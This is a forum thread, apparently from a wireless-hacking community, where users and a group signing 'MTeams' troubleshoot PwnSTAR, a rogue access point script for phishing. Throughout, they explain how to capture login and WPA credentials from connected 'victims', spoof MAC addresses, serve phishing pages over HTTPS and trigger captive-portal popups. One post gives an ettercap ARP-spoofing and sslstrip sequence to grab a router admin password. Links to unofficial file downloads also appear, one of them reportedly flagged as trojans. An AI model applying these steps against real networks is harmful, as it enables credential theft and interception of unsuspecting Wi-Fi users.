thanks, the fact is you have already showed the problem: you saw the fake page only because you opened the browser and clicked on the google icon. most people, when connected, never open the browser, because they have apps like facebook or twitter and so on that access directly to what they look for. the only real solution i think is to simulate the behaviour of public hotspots, where as soon as you connect a popup appears asking for credentials. this is what i am looking for, searching everywhere to undestand how to implement it. have you ever noticed it? do you know how to activate it? thanks

The users did not open browsers, They clicked on icons like twitter or google or facebook. However we now have a better idea what kind of test to do here We will have access to one of the two working phones mentioned. We will run some more tests and get back to you in a few days.

MTD

looking informations about public hotspots and similar i found that the popup notification appears on mobiles and pc because the routers used use a firewall to block any communication, coupled with the site redirection to the captive page. is it possible to add a firewall or something similar to the dns redirection in kali/backtrack? thanks


edit: let me explain better...as soon as they connect to an ap mobile devices send a packet to specific sites (apple.com, google.com and so on) and if they don't receive answer they show the popup asking the user to check if credentials are needed. the redirect function included in pwnstar or other scripts simply don't reject the packet, leading to a timeout connection that leave the phone thinking the connection is ok, so no popup needed. what i am thinking is to actively block the packet to make "understand" the phone the fake ap needs the credentials, just like a public hotspot.

Okay, here is where I'm at after a LOT of reading and research. Perhaps I'm overlooking something, I'm not sure.

pwnstar -> 9 -> a

Permissions have been set.

I disabled NetworkManager and installed wicd. Used it instead. Because when I used NetworkManager, it won't allow the computer to connect to the AP.

Now, with wicd, everything works except for the webpage loading.

I can connect, and it will pull up index.html.

It will NOT pull up images or the form if I click login.

After further review, I looked at the broken image on the deivce. (trying to go to Google or Facebook) .. it shows google.com/Googlewifi.jpg (or whatever it is)...or facebook.com/googlewifi.jpg

It's like it will access my AP server inititally, but it won't show the images, nor can I submit the form. When I go to submit the forum, it says it's not on the server (ie google.com/service.php is not there). It's like it's not directing properly.

What am I doing wrong? I know it's not the script; it has something to do with what I'm doing.

Hi, i have some problem with ettercap. Now my kali machine conntected to wifi network with have def gateway 192.168.0.1, my airm is to get router password. Router i suppose uses just simple http auth, i enterd :
echo "1" > proc ....
iptables -t nat - A PREroutnig..... --to-port 8080
sslstrip -l 8080 -w test3
And in another window
ettercap -T -q -M ARP /192.168.1/ // output

But i see only such things in ettercap :

DHCP : [192.168.0.1] ASK :192.168.0.43 255.255.255.0 GW 192.168.0.1 DNS 192.168.0.1

ANy ideas? Thx( also i am sure that router admin goes on router... so i should see his creds ;( )

To excelskip

First we suggest you get rid of WICD and reinstall network manager. Even in normal use WICD drops internet connections and doesnot work very well. Furthermore we are not sure pwnstar9.0 will run on wicd. We would have to go thru the lines of code but there are specific commands running network-manager in the pwnstar9 script file, an example of one is seen below:

We have covered the problem of Pwnstar9.0 on kali-linux when network-manager is installed in both our help files in our downloads and comments in this thread. The problem you mentioned can be solved easily thru the network manager icon on the upper right-hand corner of the screen.

When you setup your rogueAP you do not want network-manager trying to use the wifi device supporting the rogue. If it is actively trying to connect or connected to an AP thru that device, this then blocks a client from connecting to the rogue.

Click on the network manager > Edit Connection > Wireless > Go to each AP name listed > edit > uncheck Connect automatically on all the Connection names you have listed for the wireless device you are using with the rogue AP.

If network manager tries to connect to an access point using the rogue wireless device, click on the Disconnect line on the main drop down menu and network-manager will stop trying to associate and leave the device free for use by pwnstar9.0 other devices do not apply here. You just want the device supporting the rogue to be free.

If you are using two(2) wifi devices one(1) to provide internet access and one(1) to support the rogueAP just make, sure that network-manager doesnot try and use the wifi device supporting the rogueAP. If network manager tries to associate to an AP thru the rogues' device, just disconnect it manually thru the main menu as mentioned above and network-manager will not try and use that device again.

When pwnstar9.0 sets up a rogueAP sometimes it runs the following command

service network-manager restart

When it does this, network-manager will restart and ?MAY? try and use the wifi-device supporting the rogue. Again just manually disconnect this operation thru the main drop down network-manager icon and network-manager will not try and reestablish a connection thru that device again.

There is a list of other problems outlined in this thread that are not the fault of the pwnstar9.0 program. You should read this thread. Just back thru the pages here till you find it.

MTC

Hi, when i push Karmetasploit it creates for me fake AP but with the strange name ( name of the fake AP always my current mac)
any ideas? Thx

I gget this msg during Karmetasploit

[....] Stopping web server: apache2apache2: apr_sockaddr_info_get() failed for localhost.localdomain
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName
Any ideas? I see my fame AP but it's name i my temp mac address(
any ideas? Thx

I downloaded the zip and opened it. A second later my anti virus went up and said 3 viruses, Trojan Horses. Is this safe to keep on my computer for future installations?:confused:

Try This

Using Kali-linux

Select Accessories > files

Goto

File System/etc/apache2

Make a copy of your apache2.conf file in case you do not like the result

ctrl-c then ctrl-v over the file name is a quick method


Open your apache2.conf file with leafpad

Add the following line to the config file

ServerName localhost

Save the file

Open a terminal window

type

service apache2 restart


The warning will be gone.

MTD

Try This

Using Kali-linux

Select Accessories > files

Goto

File System/etc/apache2

Make a copy of your apache2.conf file in case you do not like the result

ctrl-c then ctrl-v over the file name is a quick method


Open your apache2.conf file with leafpad

Add the following line to the config file

ServerName localhost

Save the file

Open a terminal window

type

service apache2 restart


The warning will be gone.

MTD
Yes, thx that's helped


I pushed 3) Sniffing: provide internet access, then be MITM
re we giving internet access? (y/n)
y

Available interfaces:
wlan0

You need to reconnect internet
(ignore networkmanager applet)

DO IT NOW


If having problems, RESTART networking in nm-applet, or use Wicd

Available wireless interfaces:
wlan0

ireless interface to use for AP?
wlan0

wlan0 is in use, stupid. Try another interface

Are we giving internet access? (y/n)
y

Available interfaces:
wlan0

Can i use same interface for AP and for internet?

Go thru this thread you will find Musket Team comments on setting up this program. You cannot use the wifi device supporting the rogue to provide internet access read below

Suggest you first set up item 4 and do not provide internet access. Use another computer and see if you can:
1. See the rogue
2. Connect to the rogue
3. Bring up the web page
4. Pass data to the formdata.txt. file

Next use item 9 a. and provide internet access

You will need either two(2) wifi recievers or a wifi reciever for the rogue and a cable to provide internet access

If you use two wifi recievers one will support the rogue and one will provide the internet access.

The trick here is to know which is the rogue and which is providing said internet access

When the pwnstar program restarts network manager both wifi recievers may start searching and or connect to an AP. Let the wifi device that is providing internet access to connect to an AP and disconnect or make sure the wifi device supporting the rogue is idle. Read thru our comments in this thread it is all covered.

Continue the setup process and then test the four steps above again - You are now ready to catch a phish. However WPA phishing is different and you will need to read the help files and comments in this thread about channels and essid names.

Finally if you are using Kali 1.08 you will get a negative-one warning when first running airbase-ng BUT this doesnot seem to affect the operation.

MTC

To mazdacool

There are many downloads - what download are you talking about?

MTC

As network manager can conflict with Phishing when using PwnStar9 we provide this quick fix to keep Network Manager quiet and not try and connect to a client automatically thus disrupting the wifi device. Disabling NetworkManager is NOT the best solution. Some laptops disable the entire wifi system when you disable Network Manager. In extreme cases you can only enable it again by running a windows based application then shutting down and restarting in Linux. So rather then disable the system just put it gently to sleep as follows:

To keep NetworkManager quiet during restarts


Go to /etc/NetworkManager/system-connections/

You will see text files with the names off all your connections

Open each file with leafpad or any text editor and add to the [connection] block the following;

autoconnect=false

Here is an example of [connection] turning off the autoconnect feature - all other data is an example only and some data has been truncated

Example

[connection]
id=Wifi
uuid=fbe !truncated!
type=802-11-wireless
autoconnect=false
timestamp=1400000000

When the wifi device is in the automatically connect mode no autoconnect line is seen in the [connection] block


If you want to add mac spoofing at this time just add

cloned-mac-address=00:11:22:33:44:55

to the [802-11-wireless] block

Example

[802-11-wireless]
ssid=Home1
mode=infrastructure
mac-address=55:44:33:22:11:00
cloned-mac-address=00:11:22:33:44:55
security=802.11-wireless-security

You can still use the NetworkManager drop down menu to do these operations BUT a text editor is easier
MTD

So i tried running this with Two wireless cards and i get this error. Can anybody explain me how to solve this?
Thanks
Everything is created properly, i think. But client can't connect to the internet.
370
Thanks in advance.

You have not told us exactly what type of rogueAP you are trying to setup?

However

The primary reasson that a client cannot associate to your Rogue is that netwotk-manager(NWM) is trying to use the device that is supporting the rogue AP. Read the information in these threads this matter is covered.

In some of these menu selections, NWM is restarted during the setup stage. You get warnings. Just pause there let NWM try and connect then manually disconnect using the drop down NWM icon upper right-hand corner of the screen. NWM should now stay quiet.

The program functions well BUT there are several more steps after association before you have a fully functioning rogue.

The foursteps are:

1. RogueAP can be seen by a client.
2. Client can associate to the rogue.
3. Client can bring up the phishing page.
4. Client can write to the formdata.txt file.

If you are trying to phish for WPA keys there are other technical details dealing with your ESSID Name and Channel that have to be dealt with.

MTeams

Using PwnSTAR with Kali on RaspberryPi I've noticed that it forces me to automatically change my mac address where in a VM it states "Not changing mac address, do so manually if you want to..."

What's the reason for that, and is there any way around it? I don't want it auto-changing the mac address without an option...

PwnStar9.0 - Mac Spoofing problems

When providing internet access and the device used to provide this access is a wireless device, Network-manager must be used to connect to the AP.During program setup, the PwnStar9.0 program spoofs the mac of this device but when network-manager connects to the AP, the mac-spoofing setting in the network-manager drop down manager (i.e. Cloned MAC address) overrides the macchanging routine in PwnStar9.0. If no Cloned MAC Address is entered then network-manager uses the Device Mac Address. This can be seen by typing ifconfig in a terminal window once Pwnstar9.0 setup is complete.

Therefore if you wish to spoof the mac address of the wifi device providing internet access make sure you manually enter an address thru the network-manager menu or alter the device file in the /etc/NetworkManager/system-connections folder.

MTeams

awesome script and have just started running it however i SSH / VNC to my kali machine as its headless (no monitor / keyboard / tucked away in a cupboard).

When running this script when i confirm the network settings for the AP it drops my SSH / VNC connection to the kali machine.

Any chance of knowing why / what i can do to fix it up?

thanks eXXy.

Expanding the Phishing Ocean - Getting PwnStar9 to accept requests from HTTPS Sites

Having Pwnstar 9 accept requests from HTTPs sites in NOT a problem with Pwnstar9 coding. The problem is with Apache2.
Here is a method that has been tested to work on a kali-linux 1.09a hard drive install. After completion your phishing pages that previously could not be brought up by a https request like google will now be expressed in the clients computer.You will be able to receive both HTTP and HTTPS.
Open up a terminal window and type:

cd /etc/apache2

Make a directory called ssl

mkdir ssl

Go to the ssl directory

cd ssl

Make two more directories within ssl

mkdir crt
mkdir key

Now staying in the ssl directory enter the following:

openssl req -new -x509 -days 365 -keyout key/vhost1.key -out crt/vhost1.crt -nodes -subj '/O=VirtualHost Website Company name/OU=Virtual Host Website department/CN=www.meinedomain.com'

We suggest you copy and paste this command. It will make two files vhost1.key and vhost1.crt, one file in each folder. If there is an error, your computer misinterprerted the small ticks one before the '/0 and one tick at the end (ie com').

Now activate the ssl component in apache2 type:

sudo a2enmod rewrite

sudo a2enmod ssl

Finally go to the /etc/apache2/sites-available/ folder

In the sites-available folder you will see a file named default. Make a copy and rename it default.orig (ie default original) You are saving the original in case you make a mistake. Now go bacK to the default file, open the file with leafpad.

Either add all the data from <VirtualHost *:443> to the bottom.

Or Copy paste as required. The complete file is seen below

to test apache2 simply type

service apache2 restart.

### default starts below ###

<VirtualHost *:80>

ServerAdmin webmaster@localhost

DocumentRoot /var/www

<Directory />

Options FollowSymLinks

AllowOverride None

</Directory>

<Directory /var/www/>

Options Indexes FollowSymLinks MultiViews

AllowOverride None

Order allow,deny

allow from all

</Directory>

ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/

<Directory "/usr/lib/cgi-bin">

AllowOverride None

Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch

Order allow,deny

Allow from all

</Directory>

ErrorLog ${APACHE_LOG_DIR}/error.log

# Possible values include: debug, info, notice, warn, error, crit,

# alert, emerg.

LogLevel warn

CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

<VirtualHost *:443>

ServerAdmin webmaster@localhost

DocumentRoot /var/www

<Directory />

Options FollowSymLinks

AllowOverride None

</Directory>

<Directory /var/www/>

Options Indexes FollowSymLinks MultiViews

AllowOverride None

Order allow,deny

allow from all

</Directory>

ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/

<Directory "/usr/lib/cgi-bin">

AllowOverride None

Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch

Order allow,deny

Allow from all

</Directory>

ErrorLog ${APACHE_LOG_DIR}/error.log

# Possible values include: debug, info, notice, warn, error, crit,

# alert, emerg.

LogLevel warn

CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine On

SSLCertificateFile /etc/apache2/ssl/crt/vhost1.crt

SSLCertificateKeyFile /etc/apache2/ssl/key/vhost1.key

SSLVerifyClient optional

SSLVerifyDepth 1

SSLOptions +StdEnvVars +StrictRequire

</VirtualHost>

#####default ends above #####

You can download the config file and help files at:

http://www.datafilehost.com/d/0d3eda74

Musket Teams

My pwnstar AP had been running solidly for months. Lately I am having crashes and errors. I have the following error message in my sslstrip log:


2015-04-25 14:43:11,273 Host resolution error: [Failure instance: Traceback: <type 'exceptions.ValueError'>: I/O operation on closed file
/usr/lib/python2.7/dist-packages/twisted/internet/defer.py:551:_runCallbacks
/usr/lib/python2.7/dist-packages/twisted/internet/base.py:250:_checkTimeout
/usr/lib/python2.7/dist-packages/twisted/internet/defer.py:368:callback
/usr/lib/python2.7/dist-packages/twisted/internet/defer.py:464:_startRunCallbacks
--- <exception caught here> ---
/usr/lib/python2.7/dist-packages/twisted/internet/defer.py:551:_runCallbacks
/usr/share/sslstrip/sslstrip/ClientRequest.py:92:handleHostResolvedSuccess
]
2015-04-25 14:44:59,783 Host resolution error: [Failure instance: Traceback: <type 'exceptions.ValueError'>: I/O operation on closed file
/usr/lib/python2.7/dist-packages/twisted/internet/defer.py:551:_runCallbacks
/usr/lib/python2.7/dist-packages/twisted/internet/base.py:250:_checkTimeout
/usr/lib/python2.7/dist-packages/twisted/internet/defer.py:368:callback
/usr/lib/python2.7/dist-packages/twisted/internet/defer.py:464:_startRunCallbacks
--- <exception caught here> ---
/usr/lib/python2.7/dist-packages/twisted/internet/defer.py:551:_runCallbacks
/usr/share/sslstrip/sslstrip/ClientRequest.py:92:handleHostResolvedSuccess
]
2015-04-25 14:45:00,196 Host resolution error: [Failure instance: Traceback: <type 'exceptions.ValueError'>: I/O operation on closed file
/usr/lib/python2.7/dist-packages/twisted/internet/defer.py:551:_runCallbacks
/usr/lib/python2.7/dist-packages/twisted/internet/base.py:250:_checkTimeout
/usr/lib/python2.7/dist-packages/twisted/internet/defer.py:368:callback
/usr/lib/python2.7/dist-packages/twisted/internet/defer.py:464:_startRunCallbacks
--- <exception caught here> ---
/usr/lib/python2.7/dist-packages/twisted/internet/defer.py:551:_runCallbacks
/usr/share/sslstrip/sslstrip/ClientRequest.py:92:handleHostResolvedSuccess
]
2015-04-25 14:45:01,470 Host resolution error: [Failure instance: Traceback: <type 'exceptions.ValueError'>: I/O operation on closed file
/usr/lib/python2.7/dist-packages/twisted/internet/defer.py:551:_runCallbacks
/usr/lib/python2.7/dist-packages/twisted/internet/base.py:250:_checkTimeout
/usr/lib/python2.7/dist-packages/twisted/internet/defer.py:368:callback
/usr/lib/python2.7/dist-packages/twisted/internet/defer.py:464:_startRunCallbacks
--- <exception caught here> ---
/usr/lib/python2.7/dist-packages/twisted/internet/defer.py:551:_runCallbacks
/usr/share/sslstrip/sslstrip/ClientRequest.py:92:handleHostResolvedSuccess
]


Any thoughts as to the problem?

Hi Musket,

I followed the steps I download but got errors, please assist.

etc/apache2/sites-available# service apache2 restart
apache2: Syntax error on line 271 of /etc/apache2/apache2.conf: Cannot load /usr/local/rvm/gems/ruby-2.0.0-p247/gems/passenger-4.0.20/buildout/apache2/mod_passenger.so into server: /usr/local/rvm/gems/ruby-2.0.0-p247/gems/passenger-4.0.20/buildout/apache2/mod_passenger.so: cannot open shared object file: No such file or directory
Action 'configtest' failed.
The Apache error log may have more information.

Thank you,

Hi Musket,

I followed the steps I download but got errors, please assist.

etc/apache2/sites-available# service apache2 restart
apache2: Syntax error on line 271 of /etc/apache2/apache2.conf: Cannot load /usr/local/rvm/gems/ruby-2.0.0-p247/gems/passenger-4.0.20/buildout/apache2/mod_passenger.so into server: /usr/local/rvm/gems/ruby-2.0.0-p247/gems/passenger-4.0.20/buildout/apache2/mod_passenger.so: cannot open shared object file: No such file or directory
Action 'configtest' failed.
The Apache error log may have more information.

Thank you,

Solved, I installed passenger and configured as prompt after the installation completed.

To socialcred,

MTeams are not the authors of this program. We are just end users. We have no idea why this is occurring. You might write Vulpi to author.

If we experience this problem and find a solution we will post here. You might try reinstalling the python referenced.


MTeams

Hello to anyone who uses this on VM. I am running Kali 1.1 with VMware and am having trouble with Blackhole AP, it seems to never give internet access despite the option being selected. I can connect to soft AP and get an IP, DNS seems to work, but internet will never be provided as pass-through as it should.

Any recommendations for settings to pick when setting up a fake AP? Thanks

This script looks really interesting; look forward to trying it out when I get home next week. Just wondering if anything needs to be changed in the script now that aircrack-ng 1.2 RC 2 has changed monitor interfaces (eg. wlan0 becomes wlan0mon - not monX)? Cheers guys, aGx

This script looks really interesting; look forward to trying it out when I get home next week. Just wondering if anything needs to be changed in the script now that aircrack-ng 1.2 RC 2 has changed monitor interfaces (eg. wlan0 becomes wlan0mon - not monX)? Cheers guys, aGx

I tried it, after it started monitor and it said that no device found. I'm trying to find where does it call mon0, ...

I tried it, after it started monitor and it said that no device found. I'm trying to find where does it call mon0, ...

Thanks thepoor. How did you go? Are the interfaces defined at the start of the script or continuously throughout it? Hopefully I can get a chance to have a look myself this evening but I won't have access to my Kali machine until the weekend to play with it... Good luck.

Awesome forum btw :) aGx

To jujubee

Are you using the Musket Version of the stock version written by Vulpi.

Try using 9a to get an internet connection.

In the Musket Version we had to rewrite some of the coding for Selection Four. The Stock Versions 9a works fine.

To aGravity - we highly suggest you find a way to run the older airmon-ng.


About airmon-ng, the last official version is written here:

http://forum.aircrack-ng.org/index.php/topic,983.msg2962.html#msg2962

you dont need any wget, just go

http://svn.aircrack-ng.org/trunk/scripts/airmon-ng?p=2429

and save it as
airmon-ng.
you simply take always the newest

aircrack-suite from svn or whatever,

and

delete the newer airmon-ng you find there, and put in this one

MTeams

To aGravity - we highly suggest you find a way to run the older airmon-ng.


About airmon-ng, the last official version is written here:

http://forum.aircrack-ng.org/index.php/topic,983.msg2962.html#msg2962

you dont need any wget, just go

http://svn.aircrack-ng.org/trunk/scripts/airmon-ng?p=2429

and save it as
airmon-ng.
you simply take always the newest

aircrack-suite from svn or whatever,

and

delete the newer airmon-ng you find there, and put in this one

MTeams

Thanks for the reply mmusket33 & all the good work you/MTeams do. I ended up doing exactly what you recommended on my USB (persistence) install of Kai (which I keep Reaver 1.3 (seems to grab PSKs which Reaver 1.4/5 or wpa_supplicant/wpa_cli methods refuse to) & a few other depreciated programs on). Are there any plans to update PwnSTAR in the future? It's a handy mitm script for beginners & for some reason often works better than my own virtually identical commands for mitm attacks; for the life of me I can't work out what I'm missing on my end, but that's stuff for another post! Cheers guys, aGx

To aGravity,

IT would be helpful to us if you posted in the how to section the step by step method you used to restore the older version of airmon-ng.

Reference Pwnstar9.0 we do have a newer untested Musket Version, BUT currently we are trying to get VMR-MDK010x3.sh tested and out. We have just finished the last module. After that we will turn and continue work on the musket version of Pwnstar9.0.

MTeams

To aGravity jujubee thepoor

Reference older versions of airmon-ng. We turned our attention to your problem and have come up with this simple solution.

Those using VM ware etc can try this with any legacy program in bash.

If you try and rewrite these legacy programs to work with the newer airmon-ng text output you will have to adjust many grep, sed and awk statements just as a start.

As airmon-ng is just a bash script it should run anywhere, if you let the legacy program know where to find it.

MTeams tested the following two(2) methods to make legacy programs function when a newer airmon-ng is installed. This method does not require you to remove the newer version of airmon-ng

You can test this easily with PwnStar9.0. Below is a link to the older version of airmon-ng. Download the program if you require. Or go to an offical site. We just loaded it here to save you having to search.

http://www.datafilehost.com/d/35a8b7ec

Once you have the older version the two(2) methods are as follows.

Method 1

Place the airmon-ng program in root and make it executable.

chmod 755 /root/airmon-ng

Now test it. Type /root/airmon-ng[Enter]

You should get an airmon-ng response showing monitors etc.

Now make a copy of Pwnstar9.0 and work on the copy in case you make a mistake and open it with leafpad.

Use Ctrl H

Change all the airmon-ng enties from:

airmon-ng

to

/root/airmon-ng

In pwnstar there are 13 entries, we did the change all at once

Make your newer Pwnstar copy executable with

chmod 755 Pwnstar9.0copy

Run the program and test

Method Two

Type

locate airmon-ng

Our kali-linux places airmon-ng in

/usr/sbin/airmon-ng

and

usr/share/set/src/wireless/airmon-ng

They are the same program

Rename the airmon-ng you downloaded to airmon-old

Place it in both these folders.

Make these programs executable

chmod 755 /path to file/airmon-old

Now make a copy of Pwnstar9.0 and work on the copy in case you make a mistake and open it with leafpad.

Use Ctrl H

Change all the airmon-ng entries in Pwnstar9.0 from:

airmon-ng

to

airmon-old

Make your newer Pwnstar9.0copy executable with

chmod 755 Pwnstar9.0copy

Run the program and test

You may ask why we do not do this ourselves as it only takes about 5 minutes

We have tested both methods and Pwnstar9 ran fine.

Our associated C-Programmer says there is no problem running the older version with the newer aircrack-ng HOWEVER:

We are using the older version of aircrack-ng so we cannot actually test the result

If you test the older airmon-ng with the newer version aircrack-ng let us know the result.

Musket Teams

Thank you mmusket33 for the detailed how to...

I keep a USB (persistent) install of Kali 1.0.9a as part of my kit for recovery situations as it seems stable on most systems (Kali 1.1.0a [out-of-the-box live USB] panics my kernel on boot) - on that install I use Reaver 1.3 (for those pesky APs that won't return a valid PSK with Reaver 1.4 or 1.5 & where the wpa_supplicant/wpa_cli method refuses to work) & run the PwnSTAR script from there which works fine.

When I saw your previous post I decided to setup a simple way to use PwnSTAR on my permanent (& fully updated/upgraded) HDD install; the method I chose was to copy (& rename) the PwnSTAR friendly airmon-ng (version 1.2-rc2) script from my live USB install to a directory on my HDD. Then I wrote a simple script that swaps (renames) between the PwnSTAR compatible older airmon-ng (version 1.2-beta3) for when using PwnSTAR & back to the latest (version 1.2-rc2) when finished with PwnSTAR.

I hope that makes sense. I've just started using the same principle for changing between Reaver version 1.5.2 (which, with pixiewps, is awesome) & Reaver version 1.3 for the reason mentioned above.

Since the above steps I've had no issues using the PwnSTAR script & look forward to spending some more time with it this week. Apologies for the late reply with this post & I'm most appreciative of your step-by-step last post. Looking forward to more developments mate. Cheers, aGx

Your swaping of airmon-ng was our first approach. Your comments about reaver1.3 are noted and we will try some tests. We had a persistent usb install with 1.3 in our tool box somewhere. Thanks

Musket Teams

You're most welcome. I had a go with your method & it's certainly a better approach; especially for beginners who would most likely be gravitating towards a script like PwnSTAR in the first place. Don't hesitate to PM me if you need any future testing done. aGx

From Musket Team labs

Using legacy programs that require the older version of airmon-ng

Method Three(3)

This is the method that MTeams is using with its scripts that rqr the older airmon-ng
Newer versions do not have to be removed or altered

Turn the airmon-ng program into a function and embed it in the script.


1. Choose a name for the function.

Here we will use:

airmon-old_fn

Do this in the following order only!!!

1. Copy the legacy program

2. Open the copy of the legacy program with leafpad

3. Change all the airmon-ng entries to airmon-old_fn

Go to the beginning of your legacy program somewhere after the #!/bin/bash

Paste this first


#~~~~~~~start airmon-old_fn Start~~~~~~~~#

airmon-old_fn()
{



}

#~~~~~~~End airmon-old_fn End~~~~~~~~#


Open up the airmon-ng script and capture the entire text from #!/bin/sh to the bottom


Paste the entire airmon-ng program between the { } as indicated below


#~~~~~~~start airmon-old_fn Start~~~~~~~~#


airmon-old_fn()

{

PASTE AIRMON-ng Here

}

#~~~~~~~End airmon-old_fn End~~~~~~~~#


Save the program

Test the program

Do not forget to allow your copy of the legacy program to be executable

chmod 755 Name_of_program

Do not paste airmon-ng and then change the airmon-ng entries as this will destroy the airmon-ng script.

The program will now access the function rather then the airmon-ng program on the computer.

MTeams

To gravity

You could run your reaver1.3 version from root. Make it executable AND you must add --session=/folder/filename

This will let reaver know where to store the session. When you restart you must add the same session entry every time.

You might approach soxrok with your reaver1.3 findings and see if you can get him to rewrite reaver1.3 so it outputs all the pixiedust data sequences. We expect they could do it much quicker then anybody else.

We will send you a copy of VMR_MDK when it is completed.

MTeams

Nice one mmusket33 re. --session=/folder/filename - added that to my reaver 1.3 script; handy to keep the session directories separate!

I've got a few routers to dig out of storage before I conclude my reaver 1.3 research. There is one particular box that NO version of Reaver will deliver a PSK & for some, as yet, unknown reason wpa_supplicant (wpa_cli/wps_reg) will not fully authenticate with after a successful association.

I'll shoot of my findings to soxrok this weekend. Looking forward to VMR_MDK!

Cheers for that, aGx

Hey, (before you go further, if you don't like helping total noobs, don't bother)
I have trouble running this script, I am running it on the small kali image file and mannualy installed macchanger. I installed PwnSTAR using github.
My setup:
Raspberry pi running Kali linux
Pta01 wifi dongle with the Atheros AR9002U chipset. (drivers installed properly)

So the problem is, the script seems to run fine. But there is no AP created, nothing just showes up. When I use ''airbase-ng -c 1 -e Test wlan0'' it works just fine.
I am primarly interested in the first and 4th module (honeypot and dns spoof), so maybe I don't have to use PwnSTAR at all.
I can provide any logs if needed.

To bartvelp:

We have no experience with Rasberry PI. So although we would like to help you we cannot. All we can say is that on a hard drive dual boot XP/kali install or a persistent usb install of Kali-linux thru a pc the musket version of Pwnstar9.0 runs fine. You can find the musket version just go to the aircrack-ng forums and there is a link in these threads.

You must log in and go to the bottom of the thread. The files are available thru aircrack-ng forums

http://forum.aircrack-ng.org/index.php/topic,414.0.html

The musket version has a WPA phishing module embedded. IF you get the program running scroll thru the PWnstar Thread and get your program to accept https requests.

We are going to issue an updated musket version of this program soon as the issues surrounding the newer airmon-ng have been resolved through several workarounds.

Possibly someone running RasberryPI might help you further - just keep asking.


MTeams

Edit: with reference to mmusket33's post #74:

Expanding the Phishing Ocean - Getting PwnStar9 to accept requests from HTTPS Sites

Having Pwnstar 9 accept requests from HTTPs sites in NOT a problem with Pwnstar9 coding. The problem is with Apache2.
Here is a method that has been tested to work on a kali-linux 1.09a hard drive install. After completion your phishing pages that previously could not be brought up by a https request like google will now be expressed in the clients computer.You will be able to receive both HTTP and HTTPS...

Hi Musket Teams, nice post.

Can you confirm this is still working on your current Kali hard drive install? I gave it a try & had to comment out the two 'Listen 443' lines from my /etc/apache2/ports.conf file in order to get apache to start (& run) without errors. I don't think it's working for me as any HTTPS traffic goes through normally, as if nothing has happened. For example, if the connected 'victim' went to https://www.mail.google.com/ they would continue on to that very page using HTTPS & not be served the WPA phishing page.

All HTTP traffic does get redirected to the WPA phishing page as we'd hope for, EXCEPT any 'suffixed' address, for example:

http://www.mydomain.com - works A-OK
http://www.mydomain.com/login/ - causes a 'Not Found' Apache error (The requested URL /login/ was not found on this server.).

Is there a way to at least get ALL HTTP traffic ('suffixed' addresses like the 'http://www.mydomain.com/login' example above) to be redirected to the WPA phishing page on our Apache web server?

Thanks again mate, aGx

To aGravity,

We apologize for the late response but we have been busy off line on other projects. Just as soon as we release VMR-MDK011x8.sh a WPS locked router attack script we will immediately turn and clean up the airmon-ng problem with pwnstar9.0 and then look into your comments. However right now all we can provide are some simple possible solutions and tests.

Pwnstar has two methods to work with these web pages. The menu option 4 is limited in types of addresses it can process so try 9a but you must provide internet access in this case. This complicates WPA phishing but the attack is more resistent to webpage address failures.

Now reference HTTPS. Without the mod no webpage is offered at all. With the mod you should get the web page. Since you are talking about WPA pages we expect you are using the musket version. If you are using the stock version note we had to rewrite some code reference selection 4 to get it to work seamlessly. Selection 9a was not altered.

The test for the https functionality is that you get a web page. Without it any webpage request simply fails.

Reference the code you removed if you simply rem # out the lines then restore these lines of code and try making a simple https request like https://www.google.com and see if you get the web page and/or the internet. Then test something like .mail.google.com. We do not understand why you are not getting the web pages.

We will get back to you here when we start tests on PwnStar9 again which will be soon.

MTeams

No problems with the delay mmusket33 - I know you’re often busy with other projects. I’m just getting my Kali system back online after a fresh install so will do some testing with PwnSTAR when time allows – most likely not until next weekend. I had been getting some other strange network issues (not PwnSTAR-related) so perhaps I had broken or changed something and that will resolve itself now; either way I’ll let you know how it goes. Cheers mate, aG

ok, i have been this for nearly 12 straight hours now and I'm tired and going to take a break. I have sorted through all sorts of problems but am finally stuck. When I connect to the AP (connects fine, finally) I cannot get the webpage. I can go onto the host machine and goto 127.0.0.1 (or localhost) and the page loads fine, formdata.txt updates with input (had to install php5 and restart) or I can connect with any other device (tested on mac and android phone) and goto 192.168.0.1 and the page works fine. However when I try to connect to anything else it doesn't do anything, nothing loads (as if the webpage is not existent like going to www.sdfdsfasdfsg.com or something). I have tried creating a host file with pwnstar and also supplying my own (192.168.0.1 www*) and nothing seems to work. Does anyone have any idea why? I am still in the early stages of learning linux/hacking so I'm sure it something extremely ridiculous. Thanks in advanced for any info...

Grub

To aGravity

As promised we are slowly turning our attention back to Pwnstar9.0.

MTeams loaded kali-linux 1.1a i386 onto a laptop, updated and upgraded it, then loaded Pwnstar9-mv1-5 our current beta and setup the webpages in the /var/www folder and setup the HTTPS with Apache2.

Using two(2) wifi devices - one(1) connected to an open router and one(1) supporting the RogueAP

Using the older airmon-ng which is embedded in the program as a function.

We ran tests with Menu Item 4 (no internet connection/WPA Phishing) and 9a using a local Wifi Hotspot logon page.

Both 4 and 9a work fine to include writing the data to the formdata.txt file.

WPA Phishing with 4 was really fast while 9a depends on the strength of the internet connection. In all cases the login page was expressed in the client computer and data sent to the webpage

We could not get a rooted android phone to associate to the rogueAP but this might have been because we used a known poor internal wifi device to support the rogueAP.

MTeams
When loading kali-linux1.1a the program REM(#) out all the update addresses in the /etc/apt/sources.list. So when we went to up-date nothing happened. We have seen this before. We loaded on our own sources list and the program updated nicely.

Hence there is no problem with Pwnstar9.0 and the newest version of kali-linux.

We will probably release this beta soon as most of the changes are clerical.

MTeams

To Grub

We would like to help you but are unsure of you mean here:

????However when I try to connect to anything else it doesn't do anything, nothing loads (as if the webpage is not existent like going to www.sdfdsfasdfsg.com or something).????

What menu item are you using 4 or 9a?

What version are you using the Stock version from Vulpi or the Musket version supporting WPA Phishing

MTeams

Thank you mmusket33!

That’s great news; I’m very much looking forward to your next release. Please drop me a PM if you’d like any additional testing done as I’ve just got a fresh/clean Kali install online.

Oh, I was going through these forums the other day when I came across you mentioning ‘remote viewing’ (with regard to wpa phishing). I’d really like to hear more about that if you have time to send me a PM…

Have a nice weekend & thanks again to MTeams for taking the time to improve this great script.

aG

duplicate post on reloading browser; please ignore

Dear mmusket33,

I have some problems running PwnSTAR on Kali 2.0.

